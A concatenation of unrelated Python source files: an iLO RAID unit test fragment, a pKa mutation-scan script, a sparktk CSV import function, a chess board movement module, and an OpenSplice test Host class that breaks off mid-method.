    """create_raid_configuration is unsupported on Gen9 RIS systems.

    The raised error message must name the product, so operators can
    tell which server rejected the operation.
    """
    ld1 = {"size_gb": 150, "raid_level": '0', "is_root_volume": True}
    raid_config = {"logical_disks": [ld1]}
    product_name_mock.return_value = 'ProLiant BL460c Gen9'
    # assertRaisesRegexp is deprecated (removed in Python 3.12);
    # use assertRaisesRegex, consistent with the rest of this file.
    self.assertRaisesRegex(exception.IloCommandNotSupportedError,
                           'ProLiant BL460c Gen9',
                           self.client.create_raid_configuration,
                           raid_config)
|
<filename>pKa/pKa_mutscan.py
#!/usr/bin/env python
#
# pKa - various programs and scripts for pKa value analysis, calculation and redesign
# Copyright (C) 2010 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
# Normal mail:
# <NAME>
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
"""This script calculates delta pKa values for one or more residues for a list of mutations"""
#
# -------------------------
#
def local_defaults(pdbfile,target_residues,recalc_intpka):
    """Build the Design_pKa defaults dict shared by every mutation run.

    pdbfile: path of the PDB file to run the calculation on.
    target_residues: iterable of residue identifiers whose dpKa is wanted.
    recalc_intpka: NOTE(review): this argument is never used below -- the
        value is taken from the module-level 'options' object instead
        (see bottom of this function). Confirm whether the parameter or
        the global should be authoritative.

    Returns the populated defaults dictionary.
    """
    import pKa.Design_pKa as Design_pKa
    defaults=Design_pKa.get_defaults()
    # PDB file
    defaults['pdb'][0]=pdbfile
    #
    # pKa calculation parameters
    #
    #defaults['pHstart'][0]=0.1
    #defaults['pHstop'][0]=12.0
    defaults['pHstep'][0]=0.01
    defaults['pKMCsteps'][0]=200000
    #
    # Design settings
    #
    # Target
    #
    #target_residues=target_residues.split(',')
    # Each target gets a dummy desired pKa of 0.0; only dpKa is of interest.
    target_text=''
    for target in target_residues:
        target_text=target_text+target+'=0.0,' # Dummy pKa value
    defaults['pKas'][0]=target_text[:-1]  # strip trailing comma
    #
    # Method
    #
    defaults['dpKa_method']=['MC','junk']
    defaults['tabulated'][0]=0
    defaults['MCsteps'][0]=0
    defaults['stability_mode']=[False,'junk']
    defaults['PBEsolver']=['DelPhi','junk']
    #
    # Be not-so-noisy
    #
    defaults['verbose'][0]=5
    #
    # Minimum distance between target and mutation
    #
    #defaults['min_target_dist'][0]=min_dist
    #
    # Do not save the solutions
    #
    defaults['save_solutions'][0]=None
    #
    # NOTE(review): reads the global 'options' object, not the
    # recalc_intpka argument passed to this function -- confirm intent.
    defaults['recalc_intpka'][0]=options.recalc_intpka
    defaults['recalc_intpka_dist'][0]=options.recalc_intpka_dist
    defaults['use_titration_curves'][0]=1
    defaults['calc_dpka'][0]=1
    defaults['generate_mutations'][0]=False
    defaults['mutation_quality'][0]=0.5
    return defaults
#
# ----
#
def main(options,args):
    """Load the PDB file and the list of mutations.

    Drives the whole scan: for each mutation line, either reuse a cached
    result file or run a Design_pKa calculation, then pickle all results.
    args[0] is the PDB file; args[1] is the mutation file (unless -a).
    """
    import sys
    pdbfile=args[0]
    target_residues=options.target_groups
    #
    # Load the PDB file
    #
    import Protool
    P=Protool.structureIO()
    P.readpdb(pdbfile)
    # NOTE: Python 2 idiom - keys() returns a list that can be sorted in place.
    residues=P.residues.keys()
    residues.sort()
    if not options.allmutations:
        #
        # Load the mutations from the file given on the command line
        #
        mutfile=args[1]
        fd=open(mutfile)
        mutlines=fd.readlines()
        fd.close()
    else:
        # -a flag: generate every single-point mutation for every residue,
        # skipping the identity "mutation" to the residue's own type.
        mutlines=[]
        aas=P.trueaminoacids.keys()
        aas.sort()
        count=1
        for residue in residues:
            for aa in aas:
                if aa==P.resname(residue):
                    continue
                # Same format as a mutation-file line: <name>,<old>:<res>:<new>
                mutlines.append('clone%d,%s:%s:%s' %(count,residue,P.resname(residue),aa))
                count=count+1
        print 'Created %d mutant proteins each containing 1 mutation' %len(mutlines)
    #
    # Make the resultdir (one cached .result file per variant lives here)
    #
    import os
    resultdir=os.path.join(os.getcwd(),'pKa_mutscan_results')
    if not os.path.isdir(resultdir):
        os.mkdir(resultdir)
    #
    # Which target residues: no -t flag (or ALL) means every titratable group
    #
    if target_residues==[] or target_residues==['ALL']:
        target_residues=P.get_titratable_groups()
    import string
    target_residues=string.join(target_residues,',')
    results={}
    import pickle, os
    for mline in mutlines:
        import string
        # Skip comment lines in the mutation file
        if mline[0]=='#' or mline[:2]=='//':
            continue
        #
        line=string.strip(mline)
        sp_line=line.split(',')
        variant_name=sp_line[0]
        mutation=sp_line[1]
        print 'Variant: %s, mutations: %s' %(variant_name,mutation)
        if mutation.find('insert')!=-1:
            print 'Skipping insertions'
            continue
        #
        # Define result filename; an existing file acts as a cache so the
        # scan can be interrupted and resumed.
        #
        resultfile=os.path.join(resultdir,'mutscan_%s.result' %variant_name)
        if os.path.isfile(resultfile):
            fd=open(resultfile)
            results[variant_name]=pickle.load(fd)
            fd.close()
            #print 'Already did',mutation
        else:
            recalc_intpka=1
            defaults=local_defaults(pdbfile,target_residues,recalc_intpka)
            #
            # Set the mutations
            #
            import string
            defaults['mutations'][0]=string.strip(mutation)
            print 'Calculating for',mutation
            import pKa.Design_pKa as Design_pKa
            #
            # Set other parameters
            #
            defaults['ion'][0]=options.ion
            #
            # Calculate the dpKas
            #
            #try:
            solutions=Design_pKa.run_opt(defaults)
            #except Exception,inst:
            #    if str(inst).find('Cannot model mutant')!=-1:
            #        solutions='Cannot model mutant'
            #        raise Exception('Cannot model mutant')
            #    elif str(inst).find('We cannot model insertions')!=-1:
            #        solutions='Skipping insertions'
            #    else:
            #        print inst
            #        raise Exception(str(inst))
            print
            print
            print 'Results are ',solutions
            results[variant_name]=solutions
            #
            # Save this result (skipped when the file name would be too long
            # for the filesystem - presumably a safeguard; confirm the limit)
            #
            print 'Saving',results[variant_name],'in',resultfile
            import os
            if len(os.path.split(resultfile)[1])>80:
                continue
            fd=open(resultfile,'w')
            pickle.dump(results[variant_name],fd)
            print '*********************'
            fd.close()
    #
    # Save all results in a single pickle next to the PDB file
    #
    name=os.path.join(os.getcwd(),'%s.mutscan.pickle' %pdbfile)
    fd=open(name,'w')
    import pickle
    pickle.dump(results,fd)
    fd.close()
if __name__=="__main__":
    print
    print 'Calculate changes in pKa values for a list of mutations'
    print '(c) Copyright <NAME>, 2008-2010, All rights reserved'
    print
    import sys, os
    # Command-line interface (optparse was current when this was written)
    from optparse import OptionParser
    parser = OptionParser(usage='%prog [options] <pdbfile> <mutation_file>',version='%prog 1.0')
    # -t may be given several times; each adds one target residue
    parser.add_option('-t',"--target", dest='target_groups',type='string',action='append',
                      help="Residues to calculate dpKa values for. Specify multiple times. Default: ALL",default=[])
    # -i / -j toggle the same flag on and off
    parser.add_option('-i','--recalc_intpka',dest='recalc_intpka',action='store_true',
                      help='Recalculate intrinsic pKa for target residues. Default= %default',default=True)
    parser.add_option('-j','--no_recalc_intpka',dest='recalc_intpka',action='store_false',
                      help='Do not recalculate intrinsic pKa value for target')
    parser.add_option('-e','--recalc_intpka_dist',dest='recalc_intpka_dist',action='store',
                      help='Mutations closer than this distance to the target group will force a recalculation of the intrinsic pKa of the target. Default: %default A',
                      default=10)
    parser.add_option('-m','--ionic_strength',dest='ion',type='float',action='store',
                      help='ionic strength to use in the calculations. Default= %default',default=0.144)
    # -a generates all possible point mutations instead of reading a file
    parser.add_option('-a','--all_mutations',dest='allmutations',action='store_true',
                      help='Ignore the mutation file and try all possible mutations. Default= %default',default=False)
    (options, args) = parser.parse_args()
    # Either <pdbfile> <mutation_file>, or -a with just <pdbfile>
    if len(args)!=2 and not (options.allmutations and len(args)==1):
        parser.error('You must specify a PDB file and a mutation file, or -a and a PDB file.')
    #
    # Call main
    #
    main(options,args)
|
# vim: set encoding=utf-8
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from sparktk.tkcontext import TkContext
from pyspark.rdd import RDD
import sparktk.dtypes as dtypes
from sparktk.arguments import require_type
def import_csv_raw(path, delimiter=",", header=False, tc=TkContext.implicit):
    """
    Creates a frame by importing all fields of the specified csv file as strings.

    If the csv file has a header row, those values become the column names;
    otherwise columns are named generically, like 'C0', 'C1', 'C2', etc.

    Parameters
    ----------
    :param path: (str) Full path to the csv file
    :param delimiter: (str) A string which indicates the separation of data fields. This is usually a single character
                      and could be a non-visible character, such as a tab. The default delimiter is a comma (,).
    :param header: (bool) Boolean value indicating if the first line of the file will be used to name columns, and not
                   be included in the data. The default value is false.
    :return: (Frame) Frame that contains the data from the csv file

    Examples
    --------
    Import raw data from a csv file by specifying the path to the file, delimiter, and header option. All data will
    be brought in the frame as strings, and columns will be named according to the header row, if there was one.

        >>> file_path = "../datasets/cities.csv"

        >>> frame = tc.frame.import_csv_raw(file_path, delimiter="|", header=True)
        -etc-

        >>> frame.inspect()
        [#]  rank  city         population_2013  population_2010  change  county
        ============================================================================
        [0]  1     Portland     609456           583776           4.40%   Multnomah
        [1]  2     Salem        160614           154637           3.87%   Marion
        [2]  3     Eugene       159190           156185           1.92%   Lane
        [3]  4     Gresham      109397           105594           3.60%   Multnomah
        [4]  5     Hillsboro    97368            91611            6.28%   Washington
        [5]  6     Beaverton    93542            89803            4.16%   Washington
        [6]  15    Grants Pass  35076            34533            1.57%   Josephine
        [7]  16    Oregon City  34622            31859            8.67%   Clackamas
        [8]  17    McMinnville  33131            32187            2.93%   Yamhill
        [9]  18    Redmond      27427            26215            4.62%   Deschutes

        >>> frame.schema
        [('rank', <type 'str'>), ('city', <type 'str'>), ('population_2013', <type 'str'>), ('population_2010', <type 'str'>), ('change', <type 'str'>), ('county', <type 'str'>)]
    """
    # Validate arguments before touching Spark.
    TkContext.validate(tc)
    require_type.non_empty_str(path, "path")
    require_type.non_empty_str(delimiter, "delimiter")
    require_type(bool, header, "header")

    # Read through the sparktk-packaged spark-csv reader with schema
    # inference disabled, so every field comes back as a string.
    reader = tc.sql_context.read.format("com.databricks.spark.csv.org.trustedanalytics.sparktk")
    dataframe = reader.options(delimiter=delimiter,
                               header=str(header).lower(),
                               inferschema="false").load(path, schema=None)

    # Translate the pyspark column types into sparktk primitive types.
    schema = []
    for field in dataframe.schema.fields:
        try:
            primitive = dtypes.dtypes.get_primitive_type_from_pyspark_type(type(field.dataType))
        except ValueError:
            raise TypeError("Unsupported data type ({0}) for column {1}.".format(str(field.dataType), field.name))
        schema.append((field.name, primitive))

    # Convert the scala-backed rdd into a python-accessible RDD.
    java_rdd = tc.sc._jvm.org.trustedanalytics.sparktk.frame.internal.rdd.PythonJavaRdd.scalaToPython(dataframe._jdf.rdd())
    python_rdd = RDD(java_rdd, tc.sc)

    from sparktk.frame.frame import Frame  # circular dependency, so import late
    return Frame(tc, python_rdd, schema)
"""
Module for chess table items (board ...)
"""
import re
from chess.set import box
class Board:
    """Chess board composed of rank file positions, and pieces at play.

    Squares are keyed '<file><rank>' (e.g. 'e4'); both colors are set up
    in their standard starting arrangement on construction.
    """

    def __init__(self):
        self._positions = {}
        for file_char in 'abcdefgh':
            for rank in range(1, 9):
                square = '%s%s' % (file_char, rank)
                self._positions[square] = Position(square)
        self._piece_movement_specification = PieceMovementSpecification()
        # White on ranks 1 (back rank) and 2 (pawns)
        self._setup_major_pieces(1, box.Color.WHITE)
        self._setup_minor_pieces(2, box.Color.WHITE)
        # Black on ranks 8 (back rank) and 7 (pawns)
        self._setup_major_pieces(8, box.Color.BLACK)
        self._setup_minor_pieces(7, box.Color.BLACK)

    def _setup_major_pieces(self, rank, color):
        # Standard back-rank order from file a to file h.
        back_rank = (box.Rook, box.Knight, box.Bishop, box.Queen,
                     box.King, box.Bishop, box.Knight, box.Rook)
        for file_char, piece_type in zip('abcdefgh', back_rank):
            self._positions['%s%s' % (file_char, rank)].piece = piece_type(color)

    def _setup_minor_pieces(self, rank, color):
        # A full rank of pawns.
        for file_char in 'abcdefgh':
            self._positions['%s%s' % (file_char, rank)].piece = box.Pawn(color)

    def move_piece(self, position_from, position_to):
        """Moves piece from one position to another. Capturing a piece occupied
        by the position to move to.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        None

        Raises
        ------
        chess.board.board.IllegalMoveError
            Raised when piece move is illegal.
        """
        piece = self.get_piece(position_from)
        source = self._positions[str(position_from)]
        destination = self._positions[str(position_to)]
        allowed = self._piece_movement_specification.is_satisfied_by(source,
                                                                     destination)
        if not allowed:
            raise IllegalMoveError('%s to %s is an illegal move!'
                                   % (str(source), str(destination)))
        self._remove_piece(position_from)
        self._place_piece(position_to, piece)

    def _place_piece(self, position, piece):
        """Places piece at given position, capturing any piece already there.

        Parameters
        ----------
        position : chess.set.table.Position
            Position to place the piece on.
        piece : chess.set.box.Piece
            Chess piece to place at position.

        Returns
        -------
        None
        """
        self._positions[str(position)].piece = piece

    def _remove_piece(self, position):
        # Vacate the square.
        self._positions[str(position)].piece = None

    def get_piece(self, position):
        """Gets chess piece at given position.

        Parameters
        ----------
        position: chess.set.table.Position
            Position to get chess piece from.

        Returns
        -------
        chess.box.Piece
            Chess piece if position is occupied, otherwise None.
        """
        return self._positions[str(position)].piece
class Position:
    """Represents a chess position on the board.

    Parameters
    ----------
    square : str
        Chess board position string in the form [file][rank].
    piece : chess.set.box.Piece, optional(default=None)
        Chess piece at position. Defaults to None.

    Attributes
    ----------
    file : str
        Chess board column position, values in a-h (stored lower-case).
    rank : int
        Chess board row position, values 1-8.
    piece : chess.set.box.Piece
        Chess piece at position, or None when vacant.

    Raises
    ------
    ValueError
        If invalid square format.
    """

    def __init__(self, square, piece=None):
        # Accept upper- or lower-case files; normalise to lower-case.
        if re.match('^[a-hA-H][1-8]$', square) is None:
            raise ValueError('Invalid position format needs to '
                             'be [a-e][1-8]: %s' % square)
        file_part, rank_part = square[0], square[1]
        self.file = file_part.lower()
        self.rank = int(rank_part)
        self.piece = piece

    def is_occupied(self):
        """Informs if position is occupied by a chess piece.

        Returns
        -------
        bool
            Returns true if occupied by a chess piece, otherwise false.
        """
        return self.piece is not None

    def __str__(self):
        return self.file + str(self.rank)
class PieceMovementSpecification:
    """Dispatches movement validation to the specification for the moving piece."""

    def __init__(self):
        # Keyed by piece symbol; only pawn movement is specified so far.
        self._movement_specs = {'P': PawnMovementSpecification()}

    def is_satisfied_by(self, position_from, position_to):
        """Return True when the occupying piece has a specification that accepts the move."""
        piece = position_from.piece
        if piece is None:
            return False
        spec = self._movement_specs.get(piece.symbol)
        return spec is not None and spec.is_satisfied_by(position_from, position_to)
class MovementCompositeSpecification:
    """Base class for composable movement rules.

    Subclasses implement is_satisfied_by(); instances can be combined with
    the ``&`` and ``|`` operators to form compound specifications.
    """

    def is_satisfied_by(self, position_from, position_to):
        """Is the position change a valid move.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        bool
            If move is valid.
        """
        raise NotImplementedError()

    def __and__(self, movement_specification):
        # self & other -> satisfied only when both specifications agree.
        return AndMovementSpecification(self, movement_specification)

    def __or__(self, movement_specification):
        # self | other -> satisfied when either specification agrees.
        return OrMovementSpecification(self, movement_specification)

    @staticmethod
    def rank_distance(position_from, position_to):
        """Signed number of ranks travelled from position_from to position_to.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        int
            Distance in positions between ranks.
        """
        return position_to.rank - position_from.rank

    @staticmethod
    def file_distance(position_from, position_to):
        """Signed ordinal distance in files from position_from to position_to.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        int
            Ordinal distance in positions between files.
        """
        return ord(position_to.file) - ord(position_from.file)
class OrMovementSpecification(MovementCompositeSpecification):
    """Combines two MovementSpecifications logically by Or.

    Attributes
    ----------
    movement_specification_one: MovementCompositeSpecification
        Movement specification one (left) to combine
    movement_specification_two: MovementCompositeSpecification
        Movement specification two (right) to combine
    """

    def __init__(self, movement_specification_one, movement_specification_two):
        self.movement_specification_one = movement_specification_one
        self.movement_specification_two = movement_specification_two

    def is_satisfied_by(self, position_from, position_to):
        """Is the position change a valid move.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        bool
            If move is valid, i.e. at least one part is satisfied.
        """
        # Both sides are evaluated (no short-circuit), matching the
        # original eager behaviour.
        verdicts = [spec.is_satisfied_by(position_from, position_to)
                    for spec in (self.movement_specification_one,
                                 self.movement_specification_two)]
        return any(verdicts)
class AndMovementSpecification(MovementCompositeSpecification):
    """Combines two MovementSpecifications logically by And.

    Attributes
    ----------
    movement_specification_one: MovementCompositeSpecification
        Movement specification one (left) to combine
    movement_specification_two: MovementCompositeSpecification
        Movement specification two (right) to combine
    """

    def __init__(self, movement_specification_one, movement_specification_two):
        self.movement_specification_one = movement_specification_one
        self.movement_specification_two = movement_specification_two

    def is_satisfied_by(self, position_from, position_to):
        """Is the position change a valid move.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        bool
            If move is valid, i.e. both parts are satisfied.
        """
        # BUGFIX: the first call was misspelled 'is_satisified_by', which
        # raised AttributeError whenever an AND-composed specification was
        # actually evaluated.
        return self.movement_specification_one.is_satisfied_by(
            position_from, position_to) \
            and self.movement_specification_two.is_satisfied_by(
                position_from, position_to)
class DiagonalMovementSpecification(MovementCompositeSpecification):
    """Specification for diagonal piece movement."""

    def is_satisfied_by(self, position_from, position_to):
        """Is piece moving diagonal.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        bool
            If move is valid.
        """
        # A vacant source square can never make a move.
        if position_from.piece is None:
            return False
        return self._is_move_diagonal(position_from, position_to)

    def _is_move_diagonal(self, position_from, position_to):
        file_distance = self.file_distance(position_from, position_to)
        rank_distance = self.rank_distance(position_from, position_to)
        # BUGFIX: the original compared the signed distances directly
        # (rank_distance == file_distance), which rejected anti-diagonal
        # moves such as b2 -> a3 (-1 file, +1 rank). A move is diagonal when
        # the piece actually moves and the magnitudes match.
        return file_distance != 0 and abs(rank_distance) == abs(file_distance)
class ForwardMovementSpecification(MovementCompositeSpecification):
    """Specification for forward piece movement."""

    def is_satisfied_by(self, position_from, position_to):
        """Is piece moving forward.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        bool
            If move is valid.
        """
        # A vacant source square can never make a move.
        if position_from.piece is None:
            return False
        return self._is_movement_forward(position_from, position_to)

    def _is_movement_forward(self, position_from, position_to):
        # Forward means staying on the same file and advancing toward the
        # opponent: increasing ranks for white, decreasing for black.
        if self.file_distance(position_from, position_to) != 0:
            return False
        rank_change = self.rank_distance(position_from, position_to)
        if position_from.piece.color is box.Color.WHITE:
            return rank_change > 0
        return rank_change < 0
class PawnMovementSpecification(MovementCompositeSpecification):
    """Movement specification for valid pawn movements."""

    def is_satisfied_by(self, position_from, position_to):
        """Is valid pawn move.

        Parameters
        ----------
        position_from : chess.set.table.Position
            Position to move piece from.
        position_to : chess.set.table.Position
            Position to move piece to.

        Returns
        -------
        bool
            If move is valid.
        """
        piece = position_from.piece
        # Only applies when the moving piece is actually a pawn.
        if piece is None or piece.symbol != 'P':
            return False
        # A pawn may move forward or (when capturing) diagonally.
        pawn_rule = ForwardMovementSpecification() | DiagonalMovementSpecification()
        return pawn_rule.is_satisfied_by(position_from, position_to)
class ChessError(Exception):
    """Base class for chess exceptions.

    Catching this type also catches every more specific chess error.
    """
    pass
class IllegalMoveError(ChessError):
    """Illegal chess move was attempted.

    Raised by Board.move_piece when the movement specification rejects a move.
    """
    pass
|
<reponame>brezillon/opensplice<filename>testsuite/tests/stax/python/host.py
import os
import socket
from process import Process
from ospl import OSPL
from test_errors import TestError
#===============================================================================
class Host:
    """A machine and its environment that a part of a test case runs on.
       Each requires a STAF daemon.
    """
    # Local host default name:
    LOCAL_HOST_NAME = socket.gethostname()
    # STAF default TCP port:
    STAF_DEFAULT_PORT = 6500

    default_config_map = {
        "OSMajorVersion" : "unknown",
        "OSMinorVersion" : "unknown",
        "OSName"         : os.name,
        "OSRevision"     : "unknown",
        "FileSep"        : os.sep,
        "LineSep"        : os.linesep,
        "PathSep"        : os.pathsep}
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def __init__(self,
                 ospl_home = "",
                 test_root = ".",
                 ospl_uri  = "",
                 host_name = LOCAL_HOST_NAME,
                 staf_port = STAF_DEFAULT_PORT):
        """Constructs a host.
           Required are:
           1) The root at which the test framework can be found.
           2) The value of OSPL_HOME that is to be tested.
           3) The OSPL URI value.
           4) The/A DNS name of the host.
           5) The location of the STAF daemon if not at the default port.
        """
        # The location where the test framework can be found:
        self.test_root = test_root
        # The OSPL_HOME of the host to be tested:
        self.ospl_home = ospl_home
        # The host name:
        self.host_name = host_name
        # The port of the host STAF:
        self.staf_port = staf_port
        # Host system environment ("NAME=value" strings):
        self.host_env = []
        # List of the processes of the host:
        self.process_list = []
        # Config map for the host - contain system dependent issues.
        # BUGFIX: take a copy instead of aliasing the shared class-level
        # default dict, so per-instance changes cannot leak across hosts.
        self.config_map = dict(Host.default_config_map)
        # 'ospl' command instance:
        self.ospl = OSPL("%s%sbin%s"% (self.ospl_home,
                                       self.get_file_sep(),
                                       self.get_file_sep()), ospl_uri)
        # Check if host name is valid:
        self.check_host_name()
        # Check if STAF port is valid:
        self.check_staf_port()
        # Host log dir:
        self.log_dir = ""
        # Host release script name:
        self.release_script_name = "release"
        # Host release script ext:
        self.release_script_ext = ""
        # The host role:
        self.role = ""
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_release_script_name(self):
        """Get the host release script name"""
        return self.release_script_name
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_release_script_name(self, name):
        """Set the host release script name"""
        self.release_script_name = name
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_release_script_ext(self):
        """Get the host release script ext"""
        return self.release_script_ext
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_release_script_ext(self, ext):
        """Set the host release script ext"""
        self.release_script_ext = ext
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_test_root(self, test_root):
        """Set the host test root"""
        self.test_root = test_root
        self.check_test_root()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_test_root(self):
        """Get the host test root"""
        return self.test_root
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def check_test_root(self):
        """Check if test root location is valid"""
        # A test root must be a non-empty string:
        if (self.test_root is None or self.test_root == ""):
            raise TestError("Host::check_test_root - invalid value \"%s\" for the test root!"%\
                            self.test_root)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_ospl_home(self, ospl_home):
        """Set the host OSPL_HOME"""
        # Set:
        self.ospl_home = ospl_home
        # Check:
        self.check_ospl_home()
        # Reset 'ospl' command to new OSPL HOME:
        self.ospl.set_ospl_home_bin(self.ospl_home + "/bin/")
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_ospl_bin(self, ospl_home_bin):
        """Set the host OSPL_BIN"""
        self.ospl.set_ospl_home_bin(ospl_home_bin)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_home(self):
        """Get the host OSPL_HOME"""
        return self.ospl_home
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def check_ospl_home(self):
        """Check if OSPL_HOME is valid"""
        # OSPL_HOME must be a non-empty string:
        if (self.ospl_home is None or self.ospl_home == ""):
            raise TestError("Host::check_ospl_home - invalid value \"%s\" for the OSPL_HOME!"%\
                            self.ospl_home)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_host_name(self, host_name):
        """Set the host name"""
        self.host_name = host_name
        self.check_host_name()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_host_name(self):
        """Get the host name"""
        return self.host_name
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def check_host_name(self):
        """Check if host name is valid"""
        # A host name must be a non-empty string:
        if (self.host_name is None or self.host_name == ""):
            raise TestError("Host::check_host_name - invalid value \"%s\" for the host name!"%\
                            self.host_name)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_staf_port(self, staf_port):
        """Set the host STAF port"""
        self.staf_port = staf_port
        self.check_staf_port()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_staf_port(self):
        """Get the host STAF port"""
        return self.staf_port
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def check_staf_port(self):
        """Check if STAF port is valid"""
        # STAF port must be greater than 0:
        if (self.staf_port <= 0):
            raise TestError("Host::check_staf_port - invalid value \"%d\" for the STAF port!"%\
                            self.staf_port)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_staf_url(self):
        """Get the host STAF URL"""
        return "tcp://%s@%s"% (self.host_name, self.staf_port)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def add_process(self, process):
        """Add new process to the process list"""
        # Check if the process is Ok:
        self.check_process(process)
        # Set process ID on the host (IDs are 1-based):
        process.set_id(len(self.process_list) + 1)
        # Add process to the list:
        self.process_list.append(process)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def define_process(self,
                       command,
                       args        = "",
                       working_dir = ".",
                       log_file    = ""):
        """Define new process for the host"""
        # Create process:
        new_process = Process(command, args, working_dir, log_file)
        # Set process ID on the host (IDs are 1-based):
        new_process.set_id(len(self.process_list) + 1)
        # Add the process to the list:
        self.process_list.append(new_process)
        # Return the instance just appended:
        return self.process_list[-1]
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def check_process(self, process):
        """Check if the process object is not 'None'"""
        if process is None:
            raise TestError("Host::check_process - invalid value \"%s\" for the process object!"%\
                            process)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_all_processes(self):
        """Return the host process list"""
        return self.process_list
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_ospl_log_dir(self, ospl_log_dir):
        """Set log directory for OSPL"""
        self.ospl.set_working_dir(ospl_log_dir)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_log_dir(self):
        """Get log directory for OSPL"""
        return self.ospl.get_working_dir()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_args_to_start(self):
        """Get arguments for OSPL to start the/a domain"""
        return self.ospl.get_start_cmd_args()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_args_to_stop(self):
        """Get arguments for OSPL to stop the/a domain"""
        return self.ospl.get_stop_cmd_args()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_args_to_list(self):
        """Get arguments for OSPL to list the/a domain"""
        return self.ospl.get_list_cmd_args()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_args_to_status(self):
        """Get arguments for OSPL to get the status of the/a domain"""
        return self.ospl.get_status_cmd_args()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_command(self):
        """Get command for OSPL"""
        return self.ospl.get_command()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_config_map(self, config_map):
        """Set config for the host"""
        self.config_map = config_map
        self.check_config_map()
        # Rebuild the 'ospl' command instance so it picks up the (possibly
        # changed) file separator, keeping the current URI:
        self.ospl = OSPL("%s%sbin%s"% (self.ospl_home,
                                       self.get_file_sep(),
                                       self.get_file_sep()), self.ospl.get_uri())
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def check_config_map(self):
        """Check if the config_map object is not 'None'"""
        if self.config_map is None:
            raise TestError("Host::config_map - invalid value \"%s\" for the process object!"%\
                            self.config_map)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_config_map(self):
        """Get config of the host"""
        return self.config_map
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def is_windows(self):
